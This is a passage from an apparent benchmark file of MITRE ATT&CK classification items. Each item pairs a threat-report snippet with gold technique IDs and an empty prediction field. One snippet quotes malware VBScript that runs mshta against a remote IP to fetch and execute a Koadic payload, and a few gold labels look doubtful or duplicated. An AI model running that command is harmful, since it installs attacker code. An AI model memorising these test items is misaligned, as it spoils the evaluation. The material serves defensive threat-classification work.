copy of itself as part of lateral movement.", "gold": "- T1569.002: System Services - Service Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During Operation Wocao, threat actors encrypted IP addresses used for \"Agent\" proxy hops with RC4.\n\t - T1001: Data Obfuscation\n- Text: uses port 46769 for C2.\n\t - T1571: Non-Standard Port\n- Text: LightNeuron uses AES to encrypt C2 traffic.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", "input": "\nuses RC4 to encrypt C2 responses.", "gold": "- T1573: Encrypted Channel", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: When PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it. The resulting code has multiple layers of obfuscation\n\t - T1047: Windows Management Instrumentation\n\t - T1218.005: System Binary Proxy Execution - Mshta\n\t - T1559.001: Inter-Process Communication - Component Object Model\n\t - T1027: Obfuscated Files or Information\n- Text: BRONZE BUTLER downloads encoded payloads and decodes them on the victim.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: The implanted VBS file is capable of reporting information about infected machines and downloading additional payloads with an encoded format\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", "input": "\nThe embedded VBScript is retrieved from a resource and decrypted using the same algorithm as discussed above, which results in the following cleartext: set objshell = createobject(\\\"wscript.shell\\\")objshell.run \\\"mshta hxxp://86.106.131.177:6500/zIZFh\\\",vbhide The Koadic C2 server will respond to this request with Javascript code that acts as the Koadic staging payload, which allows the actor to run additional Koadic modules on the end system to carry out their post-exploitation activities", "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.\n\t - T1572: Protocol Tunneling\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: inserts pseudo-random characters between each original character during encoding of C2 network requests, making it difficult to write signatures on them.\n\t - T1001: Data Obfuscation\n- Text: Valak has returned C2 data as encoded ASCII.\n\t - T1132.001: Data Encoding - Standard Encoding\n", "input": "\nbase64 encodes strings that are sent to the C2 over its DNS tunnel.", "gold": "- T1001: Data Obfuscation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Threat Group-3390 actors have used gsecdump to dump credentials. They have also dumped credentials from domain controllers.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n- Text: Ke3chang has dumped credentials, including by using gsecdump.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n- Text: Whitefly has used Mimikatz to obtain credentials.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n", "input": "\nAlso, the use of the mimikatz and pwdump tools suggests the adversary attempts to dump credentials on compromised systems", "gold": "- T1003: OS Credential Dumping", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: the filename changed from tru.dll to kibuyuink.exe, even though it remained a DLL and still required regsvr32.exe to run. Changing the filename extension is a common tactic seen in various malware infections.\n\t - T1587.001: Develop Capabilities - Malware\n\t - T1546.001: Event Triggered Execution - Change Default File Association\n- Text: Blue Mockingbird has used Windows Registry modifications to specify a DLL payload.\n\t - T1112: Modify Registry\n- Text: can establish using a Registry run key.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n", "input": "\nA tool can create a new Registry key under HKEY_CURRENT_USER\\Software\\Classes\\.", "gold": "- T1112: Modify Registry", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: was distributed through a compromised update to a Tor client with a coin miner payload.\n\t - T1195: Supply Chain Compromise\n- Text: Cobalt Group has compromised legitimate web browser updates to deliver a backdoor.\n\t - T1195.002: Supply Chain Compromise - Compromise Software Supply Chain\n", "input": "\nhas targeted manufacturers in the supply chain for the defense industry.", "gold": "- T1195: Supply Chain Compromise", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: digitally signed an executable with a stolen certificate from legitimate company AI Squared.\n\t - T1553.002: Subvert Trust Controls - Code Signing\n- Text: Ember Bear has stolen legitimate certificates to sign malicious payloads.\n\t - T1588.003: Obtain Capabilities - Code Signing Certificates\n- Text: PROMETHIUM has created self-signed certificates to sign malicious installers.\n\t - T1587.002: Develop Capabilities - Code Signing Certificates\n", "input": "\nThe file, named Microsoft.Win32.TaskScheduler.dll, is digitally signed by a certificate from AirVPN", "gold": "- T1553.002: Subvert Trust Controls - Code Signing", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Flagpro v2.0 has another new function. If a dialog title is \u201cInternet Explorer [7-11]\u201d (the number after \u201cInternet Explorer\u201d depends on what version the user users) when Flagpro accesses to an external site, Flagpro sends WM_CLOSE message to close the dialog\n\t - T1070: Indicator Removal\n- Text: GrimAgent can delete previously created tasks on a compromised host.\n\t - T1070: Indicator Removal\n\t - T1070.009: Indicator Removal - Clear Persistence\n- Text: After setting up persistent access, the payload checks to see if a value exists within a registry key in the HKCU hive whose name is the same as the scheduled task (ex. This registry key is empty upon the first execution of the payload. This exception invokes the exception handler containing the HTTP communication code, allowing it to run. If either attempt is successful, the C2 server will respond with the session ID and a pre-shared key in cleartext, which it will save to the previously mentioned registry key. The C2 server will provide the pre-shared key within the response data and will provide the session ID value via the Set-Cookie field within the response, specifically the string after the PHPSESSID parameter of the cookie. If both attempts fail and the payload is unable to obtain a session ID and pre-shared key via HTTP or HTTPS, it will try to use DNS tunneling. To obtain the session ID and pre-shared key, the payload will issue a query to resolve the following domain: mail\n\t - T1070.004: Indicator Removal - File Deletion\n", "input": "\ndelets all artifacts associated with the malware from the infected machine.", "gold": "- T1070: Indicator Removal", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has a command to edit the Registry on the victim\u2019s machine.\n\t - T1112: Modify Registry\n- Text: Reg may be used to find credentials in the Windows Registry.\n\t - T1552.002: Unsecured Credentials - Credentials in Registry\n- Text: MCMD has the ability to remove set Registry Keys, including those used for persistence.\n\t - T1070.009: Indicator Removal - Clear Persistence\n", "input": "\nhas a command to create Registry entries for storing data under HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\WABE\\DataPath.", "gold": "- T1112: Modify Registry", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Pteranodon can use a dynamic Windows hashing algorithm to map API components.\n\t - T1027.007: Obfuscated Files or Information - Dynamic API Resolution\n- Text: SUNSPOT used Windows API functions such as \"MoveFileEx\" and \"NtQueryInformationProcess\" as part of the SUNBURST injection process.\n\t - T1106: Native API\n- Text: Tool Type Internal Name Industry Name Backdoor Poison Frog BONDUPDATER Backdoor Glimpse Updated BONDUPDATER Webshell HyperShell TwoFace loader Webshell HighShell TwoFace payload Webshell Minion TwoFace payload variant DNS Hijacking Toolkit webmask Related to DNSpionage Table 1\n\t - T1027: Obfuscated Files or Information\n", "input": "\nFInally , the newest sample uses dynamic API lookups to attempt to make static disassembly harder to understand.", "gold": "- T1106: Native API", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Leviathan has sent spearphishing attachments attempting to get a user to click.\n\t - T1204.002: User Execution - Malicious File\n- Text: In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file \u2013 two versions of the same LNK file and VBScript technique. These lures originate from external email addresses that the attacker rarely re-used, and they were sent to various locations of large restaurant chains, hospitality, and financial service organizations. As with previous campaigns, and as highlighted in our annual M-Trends 2017 report, FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: QAKBOT uses obfuscation across two script files, a JavaScript (.js) file and a Batch Script (.cmd) file, likely in an effort to conceal suspicious-looking command lines. \n\t - T1059: Command and Scripting Interpreter\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1027: Obfuscated Files or Information\n", "input": "\nStage 1 sample file: 3amadi_hamas.zip MD5: e686ffa90b2bfb567547f1c0dad1ae0b Type: Compressed container Child file/lure name: \u0645\u062d\u0636\u0631 \u0627\u062c\u062a\u0645\u0627\u0639 \u0627\u0644\u0639\u0645\u0627\u062f\u064a \u0645\u0639 \u0647\u0646\u064a\u0629 \u0631\u064a\u0654\u064a\u0633 \u062d\u0645\u0627\u0633 \u0627\u0645\u0633 \u0627\u0644\u0627\u062d\u062f .exe Child file/lure MD5: 92dd0f16e8ae274d83ba1d0d5b2e342 This sample ZIP file, which is similar to many other stage 1 downloaders in this campaign, contains an executable that is a compiled AutoIt script and which embeds some interesting functions (listed in the table below)", "gold": "- T1036: Masquerading\n- T1083: File and Directory Discovery\n- T1074: Data Staged", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: StrongPity can identify the hard disk volume serial number on a compromised host.\n\t - T1082: System Information Discovery\n- Text: Heyoka Backdoor has the ability to search the compromised host for files.\n\t - T1083: File and Directory Discovery\n- Text: IceApple can collect files, passwords, and other data from a compromised host.\n\t - T1005: Data from Local System\n", "input": "\ngathers information on the system and local drives.", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Attor monitors the free disk space on the system.\n\t - T1082: System Information Discovery\n- Text: ThiefQuest uses a function named \"is_debugging\" to perform anti-debugging logic. The function invokes \"sysctl\" checking the returned value of \"P_TRACED\". ThiefQuest also calls \"ptrace\" with the \"PTRACE_DENY_ATTACH\" flag to prevent debugging.\n\t - T1622: Debugger Evasion\n- Text: This technique to hijack control flow has also been used by other sophisticated attackers such as FinFisher. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap\n\t - T1027: Obfuscated Files or Information\n\t - T1106: Native API\n", "input": "\ncan collect system information, including computer name, system manufacturer, IsDebuggerPresent state, and execution path.", "gold": "- T1082: System Information Discovery\n- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dipsind can spawn remote shells.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: uses cmd.exe to set the Registry Run key value. It also has a command to spawn a command shell.\n\t - T1059: Command and Scripting Interpreter\n- Text: This PowerShell backdoor was observed to be related to the SystemBC malware as a service. The script has a hard coded C&C server IP address and port number to connect to, with data passed to the \u201cRc4_crypt\u201d function before connection.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", "input": "\nprovides command-line access to the compromised system.", "gold": "- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: yty gets an output of running processes using the \"tasklist\" command.\n\t - T1057: Process Discovery\n- Text: injects a DLL for into the explorer.exe process.\n\t - T1055: Process Injection\n- Text: 1) If the malware was executed with the \"install\" command-line argument, which uses .NET Framwork\u2019s InstallHelper method to install the malware as a service. 3) If no arguments are provided and the malware determines it is running in a Windows environment, it saves a DLL to the system that it injects into the explorer.exe process. The injected DLL executable loads the malware\u2019s executable and runs it within memory of the explorer.exe process\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n", "input": "\nlooked for a specific process running on infected servers.", "gold": "- T1057: Process Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT41 has transferred implant files using Windows Admin Shares.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: APT32 used the \"net view\" command to show all shares available, including the administrative shares such as \"C$\" and \"ADMIN$\".\n\t - T1135: Network Share Discovery\n- Text: Chimera has used \"netstat -ano | findstr EST\" to discover network connections.\n\t - T1049: System Network Connections Discovery\n", "input": "\nused net use commands to connect to lateral systems within a network.", "gold": "- T1021.002: Remote Services - SMB/Windows Admin Shares", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: As mentioned in our earlier technical report on Trojan.Hydraq, the back door allows the attacker to perform any of the following activities: - Adjust token privileges. Create, modify, and delete registry subkeys. Retrieve a list of logical drives. Uninstall itself by deleting the HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\RaS[FOUR RANDOM CHARACTERS] subkey\n\t - T1012: Query Registry\n- Text: TeamTNT has searched for attached VGA devices using lspci.\n\t - T1120: Peripheral Device Discovery\n- Text: IcedID has the ability to identify the computer name and OS version on a compromised host.\n\t - T1082: System Information Discovery\n", "input": "\nobtains a build identifier as well as victim hard drive information from Windows registry key HKLM\\SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum. Another variant gathers the victim storage volume serial number and the storage device name.", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: downloads and executes PowerShell scripts.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: BackConfig has used a custom routine to decrypt strings.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Metamorfo has encrypted payloads and strings.\n\t - T1027: Obfuscated Files or Information\n", "input": "\nAfter decoding out the blob, analysts found a PowerShell script.", "gold": "- T1546.013: Event Triggered Execution - PowerShell Profile\n- T1059.001: Command and Scripting Interpreter - PowerShell", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SMOKEDHAM has used \"net.exe user\" and \"net.exe users\" to enumerate local accounts on a compromised host.\n\t - T1087.001: Account Discovery - Local Account\n- Text: The attackers execute several Base64-encoded PowerShell commands in order to determine if the infected machine\u2019s user is in the admin or domain admin group\n\t - T1087.002: Account Discovery - Domain Account\n- Text: Kimsuky uses memory dump programs instead of using well-known malicious software and performs the credential extraction offline. It can be used as a general process dump utility that actors can embed in other scripts, as seen by Kimsuky\u2019s inclusion of ProcDump in the BabyShark malware. The victim is then redirected to the official Chrome Web Store page to install a Chrome extension, which has the ability to steal cookies and site passwords and loads a JavaScript file, named jQuery.js, from a separate site (see figure 3).[51(link is external\n\t - T1204.002: User Execution - Malicious File\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n", "input": "\nIt has the following command line argument help: info\u00a0 [options] [options]: \u00a0 -d Domain \u00a0 -o OsInfo \u00a0 -t TsInfo \u00a0 -n NetuseInfo \u00a0 -s ShareInfo ShareDir \u00a0 -c Connect Test \u00a0 -a Local And Global Group User Info \u00a0 -l Local Group User Info \u00a0 -g Global Group User Info \u00a0 -ga Group Administrators \u00a0 -gp Group Power Users \u00a0 -gd Group Domain Admins \u00a0 -f //input server list from infile, OneServerOneLine info <\\\\server> ChromePass: A tool from NirSoft used for recovering passwords stored in the Chrome browser", "gold": "- T1069: Permission Groups Discovery\n- T1087: Account Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: OSX/Shlayer can masquerade as a Flash Player update.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: Attempted to blend in with a file name that matched the system name it resided on - Configured for persistence via a crontab entry with a @reboot line - Used likely compromised infrastructure for C2\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n\t - T1036: Masquerading\n- Text: The Bazar loader has used dual-extension executable files such as PreviewReport.DOC.exe.\n\t - T1036.007: Masquerading - Double File Extension\n", "input": "\nWhitefly first infects its victims using a dropper in the form of a malicious .exe or .dll file that is disguised as a document or image.", "gold": "- T1204: User Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Windigo has delivered a generic Windows proxy Win32/Glubteta.M. Windigo has also used multiple reverse proxy chains as part of their C2 infrastructure.\n\t - T1090: Proxy\n- Text: The Seedworm group controls its Powermud backdoor from behind a proxy network to hide the ultimate command-and-control (C&C) location. The Seedworm group is the only group known to use the Powermud backdoor\n\t - T1090.002: Proxy - External Proxy\n- Text: CHOPSTICK used a proxy server between victims and the C2 server.\n\t - T1090.001: Proxy - Internal Proxy\n", "input": "\nis used for proxying connections to obfuscate command and control infrastructure.", "gold": "- T1090: Proxy", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT29 used \"AUDITPOL\" to prevent the collection of audit logs.\n\t - T1562.002: Impair Defenses - Disable Windows Event Logging\n- Text: Meteor can use Wevtutil to remove Security, System and Application Event Viewer logs.\n\t - T1070.001: Indicator Removal - Clear Windows Event Logs\n- Text: has the capability to delete files off the victim\u2019s machine.\n\t - T1070.004: Indicator Removal - File Deletion\n", "input": "\nThe threat actors used the appcmd command-line tool to unlock and disable the default logging component on the server (systsm.webServer/httplogging) and then delete existing logs from the system (see Figure 4)", "gold": "- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cobalt Group has used the Plink utility to create SSH tunnels.\n\t - T1572: Protocol Tunneling\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: APT29 has exfiltrated collected data over a simple HTTPS request to a password-protected archive staged on a victim's OWA servers.\n\t - T1048.002: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol\n- Text: uses AES to encrypt certain information sent over its C2 channel.\n\t - T1573: Encrypted Channel\n", "input": "\nInitially, the key is sent to the C2 server with the entire message and headers encrypted with the RSA key exchange algorithm", "gold": "- T1573: Encrypted Channel", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Calisto has the capability to upload and download files to the victim's machine.\n\t - T1105: Ingress Tool Transfer\n- Text: Chinese state-sponsored cyber actors have been observed: \uf0b7 Injecting into the rundll32.exe process to hide usage of Mimikatz, as well as injecting into a running legitimate explorer.exe process for lateral movement. \uf0b7 Using shellcode that injects implants into newly created instances of the Service Host process (svchost).\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n\t - T1055.002: Process Injection - Portable Executable Injection\n- Text: Traps\u00a04.0 can be configured to protect the processes that are cited as being abused in this blog from loading malicious code\n\t - T1055: Process Injection\n", "input": "\nmalware can download a remote access tool, NanoCore, and inject into another process.", "gold": "- T1055: Process Injection", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Different colors show the three dropped modules: legit app (blue), launcher (green), and decompressor with the Trojan embedded (red) The initial module drops three files that are typical for Chinese-speaking actors: a legit Symantec pcAnywhere (IntgStat.exe) for DLL side loading, a .dll launcher (pcalocalresloader.dll) and the last-stage decompressor (thumb.db)\n\t - T1055: Process Injection\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n- Text: BRONZE BUTLER has obtained and used open-source tools such as Mimikatz, gsecdump, and Windows Credential Editor.\n\t - T1588.002: Obtain Capabilities - Tool\n- Text: has used DLL search order hijacking.\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n", "input": "\nhas used DLL side-loading to launch versions of Mimikatz and PwDump6 as well as .", "gold": "- T1574.002: Hijack Execution Flow - DLL Side-Loading", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: First, they use COM object hijacking to make the malware persistent on the system even though the custom backdoor is installed only for a few hours. Second, the hex-encoded string is the C&C used by the custom backdoor while in the Delphi backdoor the C&C is embedded in the configuration\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n\t - T1546.015: Event Triggered Execution - Component Object Model Hijacking\n- Text: FunnyDream can use com objects identified with `CLSID_ShellLink`(`IShellLink` and `IPersistFile`) and `WScript.Shell`(`RegWrite` method) to enable persistence 